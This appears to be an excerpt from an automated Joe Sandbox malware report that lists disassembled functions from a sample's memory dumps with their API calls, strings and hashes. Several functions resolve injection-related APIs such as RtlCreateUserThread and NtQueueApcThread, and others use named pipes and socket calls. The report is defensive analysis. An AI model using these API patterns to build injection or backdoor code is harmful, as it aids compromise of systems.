Opcode Fuzzy Hash: 3628ba452fb9f12347beb94bf517dfb845e986fa94d428b7ed87531c0f30446e
Instruction Fuzzy Hash: 70214D36204FC19ADB24CF65E8447DAB3A8F788B88F448526EA8D57B18DF38C209C740

Function 03AA4224 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 03AA424E
GetProcAddress.KERNEL32 ref: 03AA425E

Strings

ntdll.dll, xrefs: 03AA423B
RtlCreateUserThread, xrefs: 03AA4254

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: RtlCreateUserThread$ntdll.dll
API String ID: 1646373207-2935400652
Opcode ID: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
Instruction ID: c7f30570fdbdb090b38de7b23a46590af4b14fc5eba59e4afc3ba162988f7ac7
Opcode Fuzzy Hash: ec9d2d620c63392f70290ebc437f8ca1b743032b52a150f3fdfac3901f9a5ced
Instruction Fuzzy Hash: 99012D32314B9082DB20CF55F884749B7A8F799B80F999139EADD43B14DF38C555C700

Function 03AA3C0C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 03AA3C30
GetProcAddress.KERNEL32 ref: 03AA3C40

Strings

ntdll, xrefs: 03AA3C23
NtQueueApcThread, xrefs: 03AA3C36

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: NtQueueApcThread$ntdll
API String ID: 1646373207-1374908105
Opcode ID: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
Instruction ID: f4e1595c895607db50d3f864ea455650e3d9ad2087b7fe6765f7995d920b57e1
Opcode Fuzzy Hash: 2536bb9452705a2f6e7169ceafa1b416df13a56cc0cf1ef56e7307e0eec9c158
Instruction Fuzzy Hash: A5016226314F4182DF10DF6AF85435AB364F785BD0F984926DE9947B54DF38C1558700

Function 03AA0C64 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 20libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 03AA0C79
GetProcAddress.KERNEL32 ref: 03AA0C89

Strings

IsWow64Process, xrefs: 03AA0C7F
kernel32, xrefs: 03AA0C72

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: IsWow64Process$kernel32
API String ID: 1646373207-3789238822
Opcode ID: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
Instruction ID: dc187e56cb290078be2e2b02d6639e6f1ad0292e882142bb392ba7fc3778f4a7
Opcode Fuzzy Hash: ec429c199b0f6375f9f9bb3acfabef0345e96e1c9904636b59857b424156df6f
Instruction Fuzzy Hash: 9EE04F61731B0182EE16CB59E898765A364EB9A791F482425D98B47364EF2CC289CB00

Function 03AA20AC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 03AA20BC
GetProcAddress.KERNEL32 ref: 03AA20CC

Strings

Wow64DisableWow64FsRedirection, xrefs: 03AA20C2
kernel32, xrefs: 03AA20B5

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64DisableWow64FsRedirection$kernel32
API String ID: 1646373207-736604160
Opcode ID: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
Instruction ID: 662c0e0084d6e801f0a86655ec63594cc9f9751ff205da3b474c3015e28731b8
Opcode Fuzzy Hash: ee7ac246b15703f1bae1af517107d06ce80ae1fd60a4afa284d23f3dc5206b46
Instruction Fuzzy Hash: FDD0C75077160581FE169B95FC987A46364AB5BB41F4C38368D5E07360EF2CC7DAC315

Function 03AA20E4 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 03AA20F4
GetProcAddress.KERNEL32 ref: 03AA2104

Strings

Wow64RevertWow64FsRedirection, xrefs: 03AA20FA
kernel32, xrefs: 03AA20ED

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: Wow64RevertWow64FsRedirection$kernel32
API String ID: 1646373207-3900151262
Opcode ID: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
Instruction ID: 7f8b3258d4cadcabeee08c636346d2eb94a6e89e3b083f69888bc8c4a75276bb
Opcode Fuzzy Hash: 319746fa707029ab9a73eb8f742d9554a97dfc1dcddc658422bf1e3b845b0c79
Instruction Fuzzy Hash: F7D09E5077160581EE1A9B95B8957A45364AB5BB41F4C28358D5A07360EE2CC299C311

Function 0369E04B Relevance: 6.5, APIs: 5, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 0369E11A
_snprintf.LIBCMT ref: 0369E145
_snprintf.LIBCMT ref: 0369E161
_snprintf.LIBCMT ref: 0369E216
_snprintf.LIBCMT ref: 0369E22D

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _snprintf
String ID:
API String ID: 3512837008-0
Opcode ID: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
Instruction ID: 86b563b240313bde2f96a4ee5e233010a773597e2dcfef62018c6c42ae90df41
Opcode Fuzzy Hash: 72e4e973a1d0442b98f7febb78707b45b3081222fbe35b5ecbc6412512dc3076
Instruction Fuzzy Hash: BE81C134618B488FEB45EF28DC84BAAB7E9FB99300F04056ED44AC7250DF38D945CB86

Function 036AE433 Relevance: 6.3, APIs: 5, Instructions: 76COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 036AE456

Part of subcall function 036AE6CB: _FF_MSGBANNER.LIBCMT ref: 036AE6FB
Part of subcall function 036AE6CB: _NMSG_WRITE.LIBCMT ref: 036AE705
Part of subcall function 036AE6CB: _callnewh.LIBCMT ref: 036AE739
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE744
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE74F

malloc.LIBCMT ref: 036AE464

Part of subcall function 036AE6CB: _callnewh.LIBCMT ref: 036AE75F
Part of subcall function 036AE6CB: _errno.LIBCMT ref: 036AE764

malloc.LIBCMT ref: 036AE486
_snprintf.LIBCMT ref: 036AE4A1

Part of subcall function 036AEA83: _errno.LIBCMT ref: 036AEABA
Part of subcall function 036AEA83: _invalid_parameter_noinfo.LIBCMT ref: 036AEAC5

malloc.LIBCMT ref: 036AE4BC

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errnomalloc$_callnewh$_invalid_parameter_noinfo_snprintf
String ID:
API String ID: 2026495703-0
Opcode ID: b352101c7262c8bcb4a5e96376bd10b91777e0dce9561e268234f3b9efdf5141
Instruction ID: d144d0f2dc5549d4c00dc3a0e633136ca305dbba5c60d3038bc46df01117b052
Opcode Fuzzy Hash: b352101c7262c8bcb4a5e96376bd10b91777e0dce9561e268234f3b9efdf5141
Instruction Fuzzy Hash: 7F114F30B1CF084FDBA8EB6DA54562576D1FB8C720F14495EE09EC7395DA34AC418BC5

Function 036AFA73 Relevance: 6.2, APIs: 4, Instructions: 194COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 036AFAAB

Part of subcall function 036B115F: _getptd_noexit.LIBCMT ref: 036B1163

_invalid_parameter_noinfo.LIBCMT ref: 036AFAB6
_flush.LIBCMT ref: 036AFB68
_fileno.LIBCMT ref: 036AFB89

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno_fileno_flush_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 634798775-0
Opcode ID: 34e7f92ebff520e6a17a4e985317f9f17b8bd586bad3667c73d28a98cf0395a5
Instruction ID: 7abac8fc17cfc3aafdba251242c3a9b26c90bf1c3e10c2e8261a4f97b52e7aad
Opcode Fuzzy Hash: 34e7f92ebff520e6a17a4e985317f9f17b8bd586bad3667c73d28a98cf0395a5
Instruction Fuzzy Hash: B6415B30318F0D4FC73CEA6D9D5527572F1EB59310B18066ED49AC72A7EAA0DC428AC7

Function 03AABFC0 Relevance: 6.1, APIs: 4, Instructions: 140COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
Instruction ID: 6ac87a8735c5a8c779869bf0e0dc386dedc865c6973bfc95e704f2f5acfe22df
Opcode Fuzzy Hash: 1dde0bc93da3cc204cab392ef88660b8feabc790641522e6986fd432b01f6e40
Instruction Fuzzy Hash: 4851B177341B40C6E716CF2DE98436D73A8F759B65F18412FCA468BB64CB39C1428B81

Function 03690517 Relevance: 6.1, APIs: 4, Instructions: 90COMMONLIBRARYCODE

Download Yara Rule

APIs

clock.LIBCMT ref: 0369055E
clock.LIBCMT ref: 0369056B
clock.LIBCMT ref: 03690574
clock.LIBCMT ref: 03690581

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: clock
String ID:
API String ID: 3195780754-0
Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
Instruction ID: 10444b4205b0d4d76f8fce1f1f086f747ce9a8ba4fb27e1b7e8d7560e5b3cda1
Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
Instruction Fuzzy Hash: EB110BB580C70D4FAB28EDDCA641276F7D8EB95250F29462FD8CAC3212E951DC8387D6

Function 03AA4A04 Relevance: 6.1, APIs: 4, Instructions: 80synchronizationCOMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 03AA4A45

Part of subcall function 03AAF284: _FF_MSGBANNER.LIBCMT ref: 03AAF2B4
Part of subcall function 03AAF284: _NMSG_WRITE.LIBCMT ref: 03AAF2BE
Part of subcall function 03AAF284: HeapAlloc.KERNEL32 ref: 03AAF2D9
Part of subcall function 03AAF284: _callnewh.LIBCMT ref: 03AAF2F2
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF2FD
Part of subcall function 03AAF284: _errno.LIBCMT ref: 03AAF308

htonl.WS2_32 ref: 03AA4A5B

Part of subcall function 03AA4C44: PeekNamedPipe.KERNEL32 ref: 03AA4C7C

WaitForSingleObject.KERNEL32 ref: 03AA4AB6
free.LIBCMT ref: 03AA4AF2

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: _errno$AllocHeapNamedObjectPeekPipeSingleWait_callnewhfreehtonlmalloc
String ID:
API String ID: 2495333179-0
Opcode ID: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
Instruction ID: 7f81ca8ea88265a55de8a29e2fa60353d180747f8e470cb4e64ff84cf9d9a36c
Opcode Fuzzy Hash: 92903f8e34bb86019301daba1a442a9bec2b61465fa0227abaf91983d09bc4f7
Instruction Fuzzy Hash: 6121CE3B304E4085DB28DF6BE64122AA7A9FB8DB98F0D451AEE450B718DBB8C481C344

Function 03AAC230 Relevance: 6.1, APIs: 4, Instructions: 70stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_time64.LIBCMT ref: 03AAC254

Part of subcall function 03AB145C: GetSystemTimeAsFileTime.KERNEL32 ref: 03AB146A

Part of subcall function 03AB044C: _getptd.LIBCMT ref: 03AB0454

malloc.LIBCMT ref: 03AAC29C
strtok.LIBCMT ref: 03AAC300
strtok.LIBCMT ref: 03AAC311

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: Timestrtok$FileSystem_getptd_time64malloc
String ID:
API String ID: 460628555-0
Opcode ID: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
Instruction ID: 65311ce03ea942da2df47eec4f04fb8155b249c10879111c71506d16bd62e80c
Opcode Fuzzy Hash: 2fe16f1730b9e72f7102dc70ee842add604a2edc5f5efba699c173ab423aa684
Instruction Fuzzy Hash: 0C21E2BB610B9485EB04DF9AE19856D77ACF788BE4B0A426BDF6A87750CB34C051C780

Function 036AF533 Relevance: 6.1, APIs: 4, Instructions: 64COMMONLIBRARYCODE

Download Yara Rule

APIs

_IsNonwritableInCurrentImage.LIBCMT ref: 036AF550

Part of subcall function 036B3987: _FindPESection.LIBCMT ref: 036B39B0

_initp_misc_cfltcvt_tab.LIBCMT ref: 036AF561
_initterm_e.LIBCMT ref: 036AF574
_IsNonwritableInCurrentImage.LIBCMT ref: 036AF5BD

Memory Dump Source

Source File: 00000000.00000002.3883926940.0000000003690000.00000040.00001000.00020000.00000000.sdmp, Offset: 03690000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3690000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable$FindSection_initp_misc_cfltcvt_tab_initterm_e
String ID:
API String ID: 1991439119-0
Opcode ID: 4030f444e10e83babf63ca456711778ffaca7bb986e35c3fe88b540d1c4421cc
Instruction ID: 9e21a179adfc4f490d76ac043d055a12e0398cd55748cdd339ea108c7bc5f91c
Opcode Fuzzy Hash: 4030f444e10e83babf63ca456711778ffaca7bb986e35c3fe88b540d1c4421cc
Instruction Fuzzy Hash: 9B11A935210E098BEB1AFF28EDD86E673A5F764340F48492D9402CA260EF388A84CF55

Function 03A910D0 Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

clock.LIBCMT ref: 03A91117
clock.LIBCMT ref: 03A91124
clock.LIBCMT ref: 03A9112D
clock.LIBCMT ref: 03A9113A

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: clock
String ID:
API String ID: 3195780754-0
Opcode ID: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
Instruction ID: 7bbafd17af8274db32bec85d9d63d3df31156994ef6c675257cc90de4fc1318b
Opcode Fuzzy Hash: 88d80a52c757cc5c40c2c6d70a970e4954adb33c3b78b443ec03df4506b3ea8d
Instruction Fuzzy Hash: 0811483260474665AB31EFA67980967F6E4F7843D0F2D413FEE4463705EA78C4928740

Function 03ABF5D8 Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 03ABF5FC

Part of subcall function 03AB1600: _getptd.LIBCMT ref: 03AB1616
Part of subcall function 03AB1600: __updatetlocinfo.LIBCMT ref: 03AB164B
Part of subcall function 03AB1600: __updatetmbcinfo.LIBCMT ref: 03AB1672

_errno.LIBCMT ref: 03ABF608

Part of subcall function 03AB1D18: _getptd_noexit.LIBCMT ref: 03AB1D1C

_invalid_parameter_noinfo.LIBCMT ref: 03ABF613
strchr.LIBCMT ref: 03ABF629

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
String ID:
API String ID: 4151157258-0
Opcode ID: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
Instruction ID: b7f0a9a37dff53710c39f3634a119c4efc42277285cbee789496b98477ecc766
Opcode Fuzzy Hash: 981429a1da204f704ed88d261ee2d43387d2cfac4902a0026a6358d448239ec3
Instruction Fuzzy Hash: 3511E6626082E459CB14D72598702FDF7B9E784FD4B1C422BEE964BB67DA6CC042C710

Function 03AAEF5C Relevance: 6.0, APIs: 4, Instructions: 39networkCOMMON

Download Yara Rule

APIs

accept.WS2_32 ref: 03AAEF71
send.WS2_32 ref: 03AAEFAF
send.WS2_32 ref: 03AAEFC3
closesocket.WS2_32 ref: 03AAEFD4

Part of subcall function 03AAF098: closesocket.WS2_32 ref: 03AAF0A4
Part of subcall function 03AAF098: free.LIBCMT ref: 03AAF0AE
Part of subcall function 03AAF098: free.LIBCMT ref: 03AAF0B7
Part of subcall function 03AAF098: free.LIBCMT ref: 03AAF0C0

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: free$closesocketsend$accept
String ID:
API String ID: 47150829-0
Opcode ID: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
Instruction ID: 0031bc24df628928ab8ca29b6f56d180c523a5849d6100316dd3a116b9875f45
Opcode Fuzzy Hash: caadc6cbf8b8aa9901aecb44ddbc265dbb6e74dc9ec5a2b89a727a9022558361
Instruction Fuzzy Hash: 34014436314E4481DF54DB3AEAA4B3E2761E78AFF4F04A612DE660BB54CF39C4858B41

Function 03AA53EC Relevance: 6.0, APIs: 4, Instructions: 34sleeppipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03AA5400
PeekNamedPipe.KERNEL32 ref: 03AA5425
Sleep.KERNEL32 ref: 03AA543B
GetTickCount.KERNEL32 ref: 03AA5441

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: CountTick$NamedPeekPipeSleep
String ID:
API String ID: 1593283408-0
Opcode ID: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
Instruction ID: 1c7db8d3def5726b3eb6f65ec37964eb80f3370adaed9eff1d02c2afeb4440d9
Opcode Fuzzy Hash: 210e21c30d6d06447862c16b29a5b20d0c0fb279467bc43041b9c33569e9406a
Instruction Fuzzy Hash: C3F0A432B24E5083F710CB2AF84431AA3BAF796B81F684525DBD943A64DF3CC581870A

Function 03AA48D8 Relevance: 6.0, APIs: 4, Instructions: 32sleeppipeCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 03AA48F1
PeekNamedPipe.KERNEL32 ref: 03AA4916
Sleep.KERNEL32 ref: 03AA492C
GetTickCount.KERNEL32 ref: 03AA4932

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003AE3000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a90000_2HSalvXIJE.jbxd

Yara matches

Similarity

API ID: CountTick$NamedPeekPipeSleep
String ID:
API String ID: 1593283408-0
Opcode ID: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
Instruction ID: 478ef6677da3608bd7d8ad67c65bab50769d19efae03b3a0e002af9da3fb61e6
Opcode Fuzzy Hash: aac62254f3a365505a6a564a1f05aa253f383d98e2b7473c1e2f14b721fad9df
Instruction Fuzzy Hash: 37F0D133628E4082E7108B1AF84031AB364E78AB81F284524EBC503B24DF7CC5918B04

Function 03AA76F0 Relevance: 6.0, APIs: 4, Instructions: 32memorythreadCOMMON

Download Yara Rule

APIs

InitializeProcThreadAttributeList.KERNEL32 ref: 03AA770E
GetProcessHeap.KERNEL32 ref: 03AA7714
HeapAlloc.KERNEL32 ref: 03AA7724
InitializeProcThreadAttributeList.KERNEL32 ref: 03AA773F

Memory Dump Source

Source File: 00000000.00000002.3884070020.0000000003A90000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A90000, based on PE: true

Associated: 00000000.00000002.3884070020.0000000003AD8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADB000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.3884070020.0000000003ADE000.00000040.00001000.00020000.00000000.sdmpDownload File
